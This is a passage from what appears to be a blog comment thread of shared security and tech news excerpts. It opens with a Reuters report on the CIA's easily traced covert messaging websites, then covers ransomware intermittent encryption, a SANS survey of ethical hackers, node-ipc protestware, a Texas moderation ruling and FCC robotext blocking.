Each fake website was assigned to only one spy in order to limit exposure of the entire network in case any single agent was captured, two former CIA officials told Reuters.
But the CIA made identifying those sites easy, the independent analysts said. Marczak located more than 350 websites containing the same secret messaging system, all of which have been offline for at least nine years and archived. Edwards confirmed his findings and methodology. Online records they analyzed reveal the hosting space for these front websites was often purchased in bulk by the dozen, often from the same internet providers, on the same server space. The result was that numerical identifiers, or IP addresses, for many of these websites were sequential, much like houses on the same street.
“The CIA really failed with this,” said Marczak, the Citizen Lab researcher. The covert messaging system, he said, “stuck out like a sore thumb.”
In addition, some sites bore strikingly similar names. For example, while Hosseini was communicating with the CIA through Iraniangoals.com, a site named Iraniangoalkicks.com was built for another informant. At least two dozen of the 350-plus sites produced by the CIA appeared to be messaging platforms for Iranian operatives, the analysts found.
All told, these features meant the discovery of a single spy using one of these websites would have allowed Iranian intelligence to uncover additional pages used by other CIA informants. Once those sites were identified, nabbing the operatives using them would have been simple: The Iranians just had to wait and see who showed up. In essence, the CIA used the same row of bushes for its informants worldwide. Any attentive espionage rival would have been able to spot them all, the analysts said.
This vulnerability went far beyond Iran. Written in various languages, the websites appeared to be a conduit for CIA communications with operatives in at least 20 countries, among them China, Brazil, Russia, Thailand and Ghana, the analysts found.
CIA spokeswoman Thorp declined to comment on the system.
Reuters confirmed the nature of the intelligence failure of the CIA’s cookie-cutter websites with three former national security officials.
The agency wasn’t fully aware that this system had been compromised until 2013, after many of its agents began to go missing, according to the former U.S. officials.
Still, the CIA had never considered the network safe enough for its most prized sources. Top-tier informants receive custom-made covert communications tools, built from scratch at agency headquarters in Langley, Virginia, to seamlessly blend into the life of a spy without drawing attention, three former CIA officers said.
Tomi Engdahl says:
Red Team – Physical Security – Covert Entry – EDC
https://github.com/DavidProbinsky/RedTeam-Physical-Tools#esp
Commonly used tools for Red Teaming Engagements, Physical Security Assessments, and Tactical Covert Entry.
Tomi Engdahl says:
https://hackaday.com/2022/09/30/this-week-in-security-exchange-0-day-doppelgangers-and-python-gets-bit-in-the-tar/
Chrome Root
Google Chrome is doing something new, that’s potentially controversial, that just might break things — so just another Friday. This one is a bit special, though. Google Chrome is going to begin shipping its own root store. That’s essentially the master list of what HTTPS certificates are considered valid by the browser. The big advantage here is this means that Chrome will behave the same across all platforms, no longer depending on the list of certificates provided by the OS. Of course, this also means that Google controls who gets to use HTTPS. If there is a certificate that has been manually added on the OS side, Chrome will pick it up and also honor it. We’ll see.
https://blog.chromium.org/2022/09/announcing-launch-of-chrome-root-program.html
Tomi Engdahl says:
https://hackaday.com/2022/09/30/this-week-in-security-exchange-0-day-doppelgangers-and-python-gets-bit-in-the-tar/
Intermittent Encryption, and Other Byte-Sized Stories
Ransomware campaigns have a new trick up their collective sleeves — intermittent encryption. It’s the observation that not every byte in a target file needs to be encrypted, in order to make it unusable for the owner. Encrypting every other 16 bytes makes for faster encryption and slower detection. There are other trends Sentinel One have discovered, like ransomware written in Rust and Go, and even more variations in Ransomware as a Service.
Tomi Engdahl says:
Gone in a day: Ethical hackers say it would take mere hours to empty your network
300 red teamers walk into a bar…
https://www.theregister.com/2022/10/01/ethical_hackers_sans_survey/
Once they’ve broken into an IT environment, most intruders need less than five hours to collect and steal sensitive data, according to a SANS Institute survey of more than 300 ethical hackers.
The respondents also proved the old adage that it’s not “if” but “when.” Even if their initial attack vector fails, almost 38 percent indicated they can break into an environment “more often than not” by repeated attacks.
So the research team went with the next-best option: the ethical hackers tasked with emulating the adversaries. They asked this group of bug hunters and penetration testers about their favorite attack vectors, the tools they use and their speed.
The bulk of the survey respondents (83.4%) work for companies headquartered in the US. And the largest segment (34.2%) said they worked in cybersecurity, with jobs ranging from security analyst to chief information security officer or VP of security or technology.
There’s value in knowing how long it takes an ethical hacker to breach an environment, how quickly they can shift gears, and what their favorite tactics are. Because that can help organizations focus their security investments in areas that will yield the greatest return on investment, Bromiley argued.
Speaking of return on investment, the survey found that the oldies but goodies continue to provide the biggest bang for the buck. In response to the question “Which attack vector is most likely to have the greatest return on investment?” social engineering (32.1%) and phishing (17.2%) were the top two answers. Can’t beat the classics.
For comparison, zero-day exploits (3.8%), man-in-the-middle attacks (1.4%) and DNS spoofing (1%) ranked last.
“Crafting a spear-phishing email or getting someone to click a link is relatively inexpensive, compared to writing your own piece of malware,” Bromiley pointed out, adding that this should send a straightforward message to security teams.
“Focus on the basics,” he advised. “Don’t forget that humans are involved in your security program. I do not blame the person who clicks in an email, but I do encourage that we train people to be vigilant. So user education has got to be part of our security program.”
Tomi Engdahl says:
This image shows its own MD5 checksum — and it’s kind of a big deal
https://www.bleepingcomputer.com/news/security/this-image-shows-its-own-md5-checksum-and-its-kind-of-a-big-deal/
Tomi Engdahl says:
How to Change the Boot Screen Logo on Windows With HackBGRT
https://www.makeuseof.com/windows-hackbgrt-guide/#Echobox=1664120012
Change the Windows logo on boot with whatever you like using HackBGRT.
Tomi Engdahl says:
‘Protestware’ is on the rise, with programmers self-sabotaging their own code. Should we be worried?
https://theconversation.com/protestware-is-on-the-rise-with-programmers-self-sabotaging-their-own-code-should-we-be-worried-190836#Echobox=1664315894
In March 2022, the author of node-ipc, a software library with over a million weekly downloads, deliberately broke their code. If the code discovers it is running within Russia or Belarus, it attempts to replace the contents of every file on the user’s computer with a heart emoji.
A software library is a collection of code other programmers can use for their purposes. The library node-ipc is used by Vue.js, a framework that powers millions of websites for businesses such as Google, Facebook, and Netflix.
This critical security vulnerability is just one example of a growing trend of programmers self-sabotaging their own code for political purposes. When programmers protest through their code – a phenomenon known as “protestware” – it can have consequences for the people and businesses who rely on the code they create.
Modern software systems are prone to vulnerabilities because they rely on third-party libraries. These libraries are made of code that performs particular functions, created by someone else. Using this code lets programmers add existing functions into their own software without having to “reinvent the wheel”.
The use of third-party libraries is common among programmers – it speeds up the development process and reduces costs.
These libraries are typically maintained by one or a handful of volunteers and made available to other programmers for free under an open-source software license.
The success of a third-party library is based on its reputation among programmers. A library builds its reputation over time, as programmers gain trust in its capabilities and the responsiveness of its maintainers to reported defects and feature requests.
If third-party library weaknesses are exploited, it could give attackers access to a software system. For example, a critical security vulnerability was recently discovered in the popular Log4j library.
What if vulnerabilities are not created by an attacker looking for passwords, but by the programmer themselves with the intention to make users of their library aware of a political opinion? The emergence of protestware is giving rise to such questions, and responses are mixed.
Ethical questions abound
A blog post on the Open Source Initiative site responds to the rise of protestware stating “protest is an important element of free speech that should be protected” but concludes with a warning:
“The downsides of vandalising open source projects far outweigh any possible benefit, and the blowback will ultimately damage the projects and contributors responsible.”
What is the main ethical question behind protestware? Is it ethical to make something worse in order to make a point? The answer to this question largely depends on the individual’s personal ethical beliefs.
Some people may see the impact of the software on its users and argue protestware is unethical if it’s designed to make life more difficult for them. Others may argue that if the software is designed to make a point or raise awareness about an issue, it may be seen as more ethically acceptable.
From a utilitarian perspective, one might argue that if a form of protestware is effective in bringing about a greater good (such as political change), then it can be morally justified.
From a technical standpoint, we are developing ways to automatically detect and counteract protestware. Protestware would be an unusual or surprising event in the change history of a third-party library. Mitigation is possible through redundancies – for example, code that is similar or identical to other code in the same or different libraries.
The rise of protestware is a symptom of a larger social problem. When people feel they are not being heard, they may resort to different measures to get their message across. In the case of programmers, they have the unique ability to protest through their code.
While protestware may be a new phenomenon, it is likely here to stay.
We rely on software to run our businesses and our lives. But every time we use software, we’re putting our trust in the people who wrote it. The emergence of protestware threatens to destabilise this trust if we don’t take action.
Tomi Engdahl says:
Is This the Beginning of the End of the Internet?
How a single Texas ruling could change the web forever
https://www.theatlantic.com/ideas/archive/2022/09/netchoice-paxton-first-amendment-social-media-content-moderation/671574/
Earlier this month, the court upheld a preposterous Texas law stating that online platforms with more than 50 million monthly active users in the United States no longer have First Amendment rights regarding their editorial decisions. Put another way, the law tells big social-media companies that they can’t moderate the content on their platforms. YouTube purging terrorist-recruitment videos? Illegal. Twitter removing a violent cell of neo-Nazis harassing people with death threats? Sorry, that’s censorship, according to Andy Oldham, a judge of the United States Court of Appeals and the former general counsel to Texas Governor Greg Abbott.
A state compelling social-media companies to host all user content without restrictions isn’t merely, as the First Amendment litigation lawyer Ken White put it on Twitter, “the most angrily incoherent First Amendment decision I think I’ve ever read.” It’s also the type of ruling that threatens to blow up the architecture of the internet.
Tomi Engdahl says:
https://www.washingtonpost.com/politics/2022/09/29/inside-cyberattack-method-that-targets-your-cellphone/
Tomi Engdahl says:
https://techcrunch.com/2022/09/30/testgrid-is-a-one-stop-shop-for-testing-apps-at-scale/
Tomi Engdahl says:
https://techcrunch.com/2022/09/26/cloudflare-launches-an-esim-to-secure-mobile-devices/
Tomi Engdahl says:
https://www.raspberrypi.com/news/homemade-anti-tracking-device/
Tomi Engdahl says:
Suomen tietoliikenneyhteydet suojattu monin tavoin https://www.huoltovarmuuskeskus.fi/a/suomen-tietoliikenneyhteydet-suojattu-monin-tavoin
Itämeren pohjassa rikkoutuneet Nord Stream -kaasuputket ovat herättäneet huolen siitä, voisiko samoin käydä Itämeren pohjassa kulkeville tietoliikennekaapeleille. Kansainvälisiä tietoliikenneyhteyksiä kuitenkin suojataan monin tavoin, ja yhteyksien katkeamiseen vaadittaisiin useampia samanaikaisia poikkeamia.
Tomi Engdahl says:
FCC moves to block robotexts
https://www.malwarebytes.com/blog/news/2022/09/fcc-is-finally-moving-forward-with-blocking-spam-texts
“The American people are fed up with scam texts, and we need to use every tool we have to do something about it.”. This is what Jessica Rosenworcel, Chairwoman of the US Federal Communications Commission
(FCC) said after releasing a plan that will require mobile carriers to block “robotext” text messages. Just last month, the FCC warned of a steep rise in phishing over SMS (also known as smishing or robotexts).
The plan, known as a Notice of Proposed Rulemaking (NPRM), wants mobile wireless providers to “block texts, at the network level, that purport to be from invalid, unallocated, or unused numbers, and numbers on a Do-Not-Originate (DNO) list”. Such texts are deemed “highly likely to be illegal”.